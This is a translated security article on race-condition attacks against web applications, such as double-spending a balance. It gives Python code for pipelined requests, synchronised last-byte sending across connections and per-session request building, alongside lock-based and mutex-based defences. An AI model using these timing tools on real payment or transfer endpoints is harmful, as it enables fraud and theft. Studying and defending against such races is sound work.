Race condition in web applications

TL;DR: This article describes lesser-known race condition tricks that are rarely used in attacks of this type. Based on this research, we built our own framework for race condition attacks, RacePWN.


Vasya wants to transfer the 100 dollars he has in his account to Petya. He opens the Transfers tab, enters Petya's nickname, types 100 in the amount field, and presses the Transfer button. The recipient and the amount are sent to the web application. What can happen inside? What does a programmer need to do to make everything work correctly?

- Make sure Vasya has the amount available for transfer.

Read the user's current balance; if it is less than the amount he wants to transfer, tell him so. Our site offers no credit, so a balance must never go negative.

- Subtract the transfer amount from the user's balance.

Write the current balance minus the transfer amount back to the user's balance: it was 100, it becomes 100 - 100 = 0.


- Add the transferred amount to Petya's balance.

For Petya it is the other way around: it was 0, it becomes 0 + 100 = 100.

- Show the user a message saying that he did great!

When writing a program, a developer combines simple algorithms into a single flow, which becomes the program's logic. In our case, the task is to implement transferring money (points, credits) from one user to another in a web application. Following this logic, we get an algorithm consisting of several checks. Stripping out everything unnecessary, we can write it as pseudocode:

    if (Vasya.balance >= transfer_amount) then
        Vasya.balance = Vasya.balance - transfer_amount
        Petya.balance = Petya.balance + transfer_amount
        show_success()
    else
        show_error()

All of this would work fine if requests were processed strictly one after another. But a site serves many users at the same time, and not in a single thread: modern web applications use multiprocessing and multithreading to process data in parallel. Along with multithreading came an amusing architectural vulnerability: the race condition.

Now imagine that our algorithm runs three times simultaneously.

Vasya still has 100 points, but somehow he has sent the request to the web application in three threads at once (with minimal time between the requests). All three threads check that user Petya exists and that Vasya's balance is sufficient for the transfer. At the moment the algorithm checks the balance, it is still 100. As soon as the checks pass, 100 is deducted from the balance three times, and 100 is added to Petya's balance three times.
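To make this interleaving concrete, here is a minimal Python simulation. It is an illustration, not code from any real application, and the `Accounts` class and account names are hypothetical. Each individual balance update is atomic, like a single SQL `UPDATE`, but the check and the update are separate steps. The `threading.Barrier` is an artificial device that forces every thread to finish its check before any thread writes; in a real attack, that ordering only happens when the requests arrive close enough together.

```python
import threading


class Accounts:
    """Balances where each single update is atomic, like one SQL UPDATE statement."""

    def __init__(self, balances):
        self._balances = dict(balances)
        self._lock = threading.Lock()

    def get(self, name):
        with self._lock:
            return self._balances[name]

    def add(self, name, delta):
        with self._lock:
            self._balances[name] += delta

    def snapshot(self):
        with self._lock:
            return dict(self._balances)


def transfer(accounts, src, dst, amount, barrier):
    # Time of check: read the balance and decide whether the transfer is allowed.
    allowed = accounts.get(src) >= amount
    # Artificial: make every thread finish its check before any thread writes.
    barrier.wait()
    # Time of use: act on a check that may already be stale.
    if allowed:
        accounts.add(src, -amount)
        accounts.add(dst, amount)


def run_race(threads=3):
    accounts = Accounts({"vasya": 100, "petya": 0})
    barrier = threading.Barrier(threads)
    workers = [
        threading.Thread(target=transfer, args=(accounts, "vasya", "petya", 100, barrier))
        for _ in range(threads)
    ]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return accounts.snapshot()


if __name__ == "__main__":
    print(run_race())  # {'vasya': -200, 'petya': 300}
```

With a single thread, `run_race(1)` yields the correct `{'vasya': 0, 'petya': 100}`. With three threads, every check sees 100, which reproduces the outcome described in the text.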

What do we end up with? Vasya's balance is negative (100 - 300 = -200 points), while Petya has 300 points, although he should have 100. This is a typical example of exploiting a race condition, comparable to several people getting through a turnstile on a single pass at once. Below is a screenshot of this situation from 4lemon.

Race conditions can occur both in multithreaded applications and in the databases they work with, and not only in web applications: for example, they are a frequent vector for privilege escalation in operating systems. Still, web applications have their own specifics for successful exploitation, and that is what I want to talk about.

Typical race condition exploitation

A hacker walks into a hookah lounge, an escape room and a bar, and he's got a race condition! (Omar Ganiev)

In most cases, multithreaded software is used as the client for testing or exploiting race conditions, for example Burp Suite and its Intruder tool: you set one HTTP request to repeat, configure many threads, and start the flood, as in this article or in this one. This is a perfectly workable method if the server allows many threads to hit its resource, and, as the articles above say, if it doesn't work the first time, try again. But in some situations it may not be effective, especially if you remember how such applications access the server.

What happens on the server

Each thread establishes a TCP connection, sends data, waits for a response, closes the connection, opens it again, sends data, and so on. At first glance, all the data is sent at the same time, but the HTTP requests themselves may arrive out of sync and scattered because of the transport layer, the need to establish a secure connection (HTTPS) and resolve DNS (not in Burp's case), and the many layers of abstraction the data passes through before it reaches the network device. When milliseconds matter, this can play a key role.

HTTP pipelining

Recall HTTP pipelining, which lets you send several requests over a single socket. You can see how it works with the netcat utility (you do have GNU/Linux, right?).

In fact, you should use Linux for many reasons: it has a more modern TCP/IP stack, supported by the operating system kernel, and the server is most likely running it too.

For example, run nc google.com 80 and paste these lines, ending with an empty line:

    GET / HTTP/1.1
    Host: google.com

    GET / HTTP/1.1
    Host: google.com

    GET / HTTP/1.1
    Host: google.com

This sends three HTTP requests within one connection, and you will receive three HTTP responses. This feature can be used to minimize the time between requests.
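The same experiment can be scripted. The sketch below uses only the Python standard library, and its function names are hypothetical. It concatenates several GET requests into one buffer, writes that buffer to a single TCP socket, and reads until the server closes the connection. Adding `Connection: close` to the last request is this sketch's own choice, so that reading has a clear end. Plain HTTP on port 80 is assumed; HTTPS would additionally need an `ssl`-wrapped socket.

```python
import socket


def pipelined_payload(host, paths):
    """Concatenate several GET requests into one buffer for a single write."""
    requests = []
    for i, path in enumerate(paths):
        # Ask the server to close after the last response, so we know when to stop reading.
        extra = "Connection: close\r\n" if i == len(paths) - 1 else ""
        requests.append(f"GET {path} HTTP/1.1\r\nHost: {host}\r\n{extra}\r\n")
    return "".join(requests).encode("ascii")


def send_pipelined(host, paths, port=80, timeout=5.0):
    """Send all requests over one TCP connection and return the raw responses."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(pipelined_payload(host, paths))
        chunks = []
        while True:
            chunk = sock.recv(65536)
            if not chunk:  # the server closed the connection after the last response
                break
            chunks.append(chunk)
    return b"".join(chunks)
```

For example, `send_pipelined("google.com", ["/", "/", "/"])` returns the responses back to back as raw bytes. Whether a given server actually honours pipelining is up to that server.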

What happens on the server

The web server receives the requests sequentially (that's the key word) and processes them one after another. This can be used for multi-step attacks (when two actions must be performed within a minimal amount of time) or, for example, to slow the server down with the first request and thereby increase the attack's chance of success.

The trick is that you can hold back the server from processing your request by loading its DBMS, especially with requests that use INSERT/UPDATE. Heavier requests “slow down” the backend, so there is a high probability that you will win the race.

Splitting an HTTP request into two parts

First, recall how an HTTP request is structured. As you know, the first line contains the method, the path and the protocol version:

    GET / HTTP/1.1

Next come the headers, up to the line break:

    Host: google.com
    Cookie: a=1

But how does the web server know that the HTTP request has ended?

Let's look at an example: run nc google.com 80 and type

    GET / HTTP/1.1
    Host: google.com

After you press ENTER, nothing happens. Press it again, and you will see the response. In other words, for the web server to accept an HTTP request, it needs two line breaks. A correct request looks like this:

    GET / HTTP/1.1\r\nHost: google.com\r\n\r\n

If this were a POST request (don't forget the Content-Length header), a correct HTTP request would look like this:

    POST / HTTP/1.1
    Host: google.com
    Content-Length: 3

    a=1

or

    POST / HTTP/1.1\r\nHost: google.com\r\nContent-Length: 3\r\n\r\na=1

Try sending a similar request from the command line:

    echo -ne "GET / HTTP/1.1\r\nHost: google.com\r\n\r\n" | nc google.com 80

You will receive a response, because the HTTP request is complete. But if you remove the final \n character, you will not get a response.
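To see why the missing \n stalls the server, here is a simplified sketch of the completeness check a server has to perform. It finds the empty line that ends the headers, then waits for Content-Length bytes of body. The `request_complete` function is hypothetical and only illustrative: real servers also handle chunked transfer encoding, bare \n line endings and malformed input, all of which this sketch ignores.

```python
def request_complete(buf):
    """Return True once buf holds a whole HTTP/1.1 request: headers, empty line, body."""
    end = buf.find(b"\r\n\r\n")
    if end == -1:
        return False  # the empty line that ends the headers has not arrived yet
    body_length = 0
    for line in buf[:end].split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            body_length = int(value.strip())
    # The body is complete only when Content-Length bytes follow the empty line.
    return len(buf) >= end + 4 + body_length


if __name__ == "__main__":
    print(request_complete(b"GET / HTTP/1.1\r\nHost: google.com\r\n\r\n"))  # True
    print(request_complete(b"GET / HTTP/1.1\r\nHost: google.com\r\n\r"))    # False
    print(request_complete(b"POST / HTTP/1.1\r\nHost: google.com\r\nContent-Length: 3\r\n\r\na=1"))  # True
    print(request_complete(b"POST / HTTP/1.1\r\nHost: google.com\r\nContent-Length: 3\r\n\r\na="))   # False
```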

In fact, many web servers accept a bare \n as the line break, so it is important not to swap \r and \n; otherwise the tricks below may not work.

What does this give us? You can open multiple connections to a resource at once, send 99% of each HTTP request, and hold back the last byte. The server will wait until it receives the final line feed. Once the bulk of the data has clearly been delivered, send the last byte (or last few bytes).

This matters most for a large POST request, for example a file upload. But it makes sense even for a small request, since delivering a few bytes at the same moment is much faster than delivering kilobytes.




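Preparing the held-back part is just a matter of slicing the raw request. Here is a minimal sketch in which `split_request` is a hypothetical helper. For a request without a body, the tail is the final \n. For a POST, it is the last byte of the body, which the server is still waiting for because of Content-Length.

```python
def split_request(raw, tail_len=1):
    """Split a raw request into a large head (sent early) and a tiny tail (held back)."""
    if not 1 <= tail_len < len(raw):
        raise ValueError("tail_len must be at least 1 and shorter than the request")
    return raw[:-tail_len], raw[-tail_len:]


if __name__ == "__main__":
    get = b"GET / HTTP/1.1\r\nHost: google.com\r\n\r\n"
    head, tail = split_request(get)
    print(head[-3:], tail)  # b'\r\n\r' b'\n'

    post = b"POST / HTTP/1.1\r\nHost: google.com\r\nContent-Length: 3\r\n\r\na=1"
    head, tail = split_request(post)
    print(tail)  # b'1'
```

With the default `tail_len=1`, the head of a bodiless request ends in `\r\n\r`, so the server has not yet seen the empty line that would complete it.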

The delay before sending the second part of the request

According to Vlad Roskov's research, it is worth not only splitting the request but also waiting a few seconds between sending the main part of the data and the final part. This is because the web server starts parsing requests before it has received them in full.

What happens on the server

For example, when nginx receives HTTP request headers, it starts parsing them and keeps the incomplete request in its buffer. When the last byte arrives, nginx takes the partially processed request and passes it straight to the application. This reduces the processing time after the final byte and increases the attack's chance of success.
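Putting the split and the delay together, a minimal sketch might look like this. It is not RacePWN's implementation, and `race_send` is a hypothetical name. The sketch speaks plain HTTP only (no TLS) and reads just the first chunk of each response. Its default two-second delay is an arbitrary value in the spirit of the "few seconds" mentioned above.

```python
import socket
import time


def race_send(host, port, raw, connections=5, delay=2.0, timeout=10.0):
    """Deliver the final byte of `raw` on several connections at (nearly) the same moment.

    Plain HTTP only: an HTTPS target would need each socket wrapped with ssl.
    """
    head, tail = raw[:-1], raw[-1:]
    socks = []
    try:
        # 1. Open every connection and send all but the last byte.
        for _ in range(connections):
            sock = socket.create_connection((host, port), timeout=timeout)
            socks.append(sock)
            # Disable Nagle's algorithm so the one-byte tail is not held back by the kernel.
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
            sock.sendall(head)
        # 2. Give the server time to parse the partial requests.
        time.sleep(delay)
        # 3. Release the final byte on every connection back to back.
        for sock in socks:
            sock.sendall(tail)
        # 4. Collect the first chunk of each response.
        return [sock.recv(65536) for sock in socks]
    finally:
        for sock in socks:
            sock.close()
```

The tails are sent in a tight loop after all the heads are already in place. This means only a handful of bytes separate the moments when the requests become complete.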

How to deal with it

First of all, this is, of course, an architectural problem: if the web application is designed correctly, such races can be avoided.

The usual countermeasures are:

- Use locks.

The DBMS blocks access to a locked object until it is unlocked; everyone else waits on the sidelines. Locks have to be used correctly: do not lock anything you don't need.

- Tune transaction isolation.

Serializable transactions guarantee that transactions run as if strictly one after another; however, this can hurt performance.

- Use mutex semaphores (hehe).

Take some external key-value store (for example, etcd). When the function is called, create a record with a given key; if the record cannot be created, it already exists, and the request is aborted. When request processing finishes, the record is deleted.
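The first item of the list (locks) can be sketched with SQLite, chosen here only because it ships with Python; the schema and names are hypothetical. `BEGIN IMMEDIATE` takes the database write lock before the balance is read, so concurrent transfers queue up instead of all reading the same 100. In PostgreSQL or MySQL the usual equivalent is `SELECT ... FOR UPDATE` inside a transaction, which locks only the selected row.

```python
import os
import sqlite3
import tempfile
import threading


def create_db(path):
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER NOT NULL)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)", [("vasya", 100), ("petya", 0)])
    con.commit()
    con.close()


def transfer(path, src, dst, amount):
    # isolation_level=None: the sqlite3 module opens no implicit transactions; we do it by hand.
    # timeout: how long to wait for another connection's lock before giving up.
    con = sqlite3.connect(path, timeout=10, isolation_level=None)
    try:
        # Take the write lock *before* reading, so a concurrent transfer waits here
        # instead of reading a balance that is about to change.
        con.execute("BEGIN IMMEDIATE")
        (balance,) = con.execute("SELECT balance FROM accounts WHERE name = ?", (src,)).fetchone()
        if balance < amount:
            con.execute("ROLLBACK")
            return False
        con.execute("UPDATE accounts SET balance = balance - ? WHERE name = ?", (amount, src))
        con.execute("UPDATE accounts SET balance = balance + ? WHERE name = ?", (amount, dst))
        con.execute("COMMIT")
        return True
    finally:
        con.close()  # closing without COMMIT rolls back an unfinished transaction


def run_locked(threads=3):
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "bank.db")
        create_db(path)
        results = []

        def worker():
            results.append(transfer(path, "vasya", "petya", 100))

        workers = [threading.Thread(target=worker) for _ in range(threads)]
        for w in workers:
            w.start()
        for w in workers:
            w.join()

        con = sqlite3.connect(path)
        balances = dict(con.execute("SELECT name, balance FROM accounts ORDER BY name"))
        con.close()
    return sorted(results), balances


if __name__ == "__main__":
    print(run_locked())  # ([False, False, True], {'petya': 100, 'vasya': 0})
```

SQLite's write lock covers the whole database, which is coarser than a row lock. On a busy system that is exactly the "locking too much" the text warns about.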

In general, I liked the video of Ivan Zvityagi's talk on locks and transactions; it is very informative.
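The key-based "mutex" from the last item of the list can be sketched as follows; all names are hypothetical. To keep the example self-contained, an in-memory `KeyStore` stands in for etcd. With real etcd, the create-if-absent step would typically be a transaction that checks the key's create revision is 0 before writing it, usually with a lease attached so that the key expires if the handler crashes.

```python
import threading
from contextlib import contextmanager


class KeyStore:
    """In-memory stand-in for etcd: create() succeeds only if the key is absent."""

    def __init__(self):
        self._keys = set()
        self._lock = threading.Lock()

    def create(self, key):
        with self._lock:  # the check and the insert must be one atomic step
            if key in self._keys:
                return False
            self._keys.add(key)
            return True

    def delete(self, key):
        with self._lock:
            self._keys.discard(key)


class RequestInProgress(Exception):
    """Raised when the same operation is already being processed."""


@contextmanager
def request_mutex(store, key):
    # At the start of the request: create the record, or abort if it already exists.
    if not store.create(key):
        raise RequestInProgress(key)
    try:
        yield
    finally:
        # At the end of request processing (even on errors): delete the record.
        store.delete(key)


if __name__ == "__main__":
    store = KeyStore()
    with request_mutex(store, "transfer:vasya"):
        try:
            with request_mutex(store, "transfer:vasya"):  # a concurrent duplicate
                pass
        except RequestInProgress:
            print("second request aborted")
    with request_mutex(store, "transfer:vasya"):  # free again after the first finished
        print("next request proceeds")
```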

Session quirks and race conditions

One quirk of sessions is that they can themselves prevent a race from being exploited. For example, in PHP, after session_start() the session file is locked, and it is unlocked only when the script finishes (unless session_write_close() is called). If another script that uses the same session is called in the meantime, it waits.

To get around this, use a simple trick: log in as many times as you need. If the web application allows multiple sessions for a single user, collect all the PHPSESSID values and give each request its own identifier.
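Giving each request its own session is easy to automate once the session IDs are collected. Here is a minimal sketch that assumes the IDs were obtained by logging in several times and that the target accepts a form POST. The helper, the path and the form fields (`to=petya&amount=100`) are hypothetical.

```python
def requests_per_session(host, path, body, session_ids):
    """Build one raw POST request per PHPSESSID, so no two requests share a session lock."""
    data = body.encode("ascii")
    requests = []
    for sid in session_ids:
        head = (
            f"POST {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Cookie: PHPSESSID={sid}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(data)}\r\n"
            "\r\n"
        )
        requests.append(head.encode("ascii") + data)
    return requests


if __name__ == "__main__":
    # Hypothetical session IDs, path and form fields.
    for raw in requests_per_session("example.com", "/transfer", "to=petya&amount=100",
                                    ["sess1", "sess2", "sess3"]):
        print(raw.split(b"\r\n")[2])  # b'Cookie: PHPSESSID=sess1', then sess2, sess3
```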

Proximity to the server

If the site where you want to exploit a race condition is hosted on AWS, rent a machine in AWS. If it is on DigitalOcean, rent one there.

When the goal is to send requests with a minimal interval between them, being close to the web server is undoubtedly an advantage.

After all, a 200 ms ping to the server is very different from a 10 ms one. And if you're lucky, you may even end up on the same physical server, which makes winning the race a bit easier :)
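To compare candidate machines, you can time the TCP handshake to the target from each of them, which roughly approximates one network round trip. Here is a minimal standard-library sketch in which `tcp_connect_ms` is a hypothetical helper. DNS is resolved once up front so that it does not skew the timings, and port 443 is just a default.

```python
import socket
import statistics
import time


def tcp_connect_ms(host, port=443, samples=5, timeout=3.0):
    """Median time to complete a TCP handshake with host:port, in milliseconds."""
    # Resolve once up front so DNS lookups do not end up in the measurements.
    family, socktype, proto, _, addr = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)[0]
    timings = []
    for _ in range(samples):
        with socket.socket(family, socktype, proto) as sock:
            sock.settimeout(timeout)
            start = time.perf_counter()
            sock.connect(addr)  # returns once the handshake completes (about one round trip)
            timings.append((time.perf_counter() - start) * 1000.0)
    return statistics.median(timings)
```

Running `tcp_connect_ms("target.example")` from each candidate machine and comparing the medians shows which location is closest; `target.example` is a placeholder.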

Summing up

Various tricks can increase the likelihood of successfully exploiting a race condition: send multiple requests within one connection (keep-alive), slowing down the web server; split each request into parts and add a delay before sending the rest; reduce the distance to the server and the number of abstraction layers between you and the network interface.

As a result of this analysis, together with Michail Badin, we developed the RacePWN tool.

It consists of two components:

- librace, a C library that sends a large number of HTTP requests to the server in the shortest possible time, using most of the tricks from this article;

- racepwn, a utility that takes a JSON configuration as input and drives the library accordingly.

RacePWN can be integrated into other tools (for example, Burp Suite), or you can build a web interface for managing races (we never got around to it). Enjoy!

There is still room to grow, of course: HTTP/2 and its potential for attacks, for instance. But at the moment, most resources support HTTP/2 only at the front end, proxying requests to good old HTTP/1.1.

Maybe you know some other details?


Source: https://habr.com/ru/post/460339/
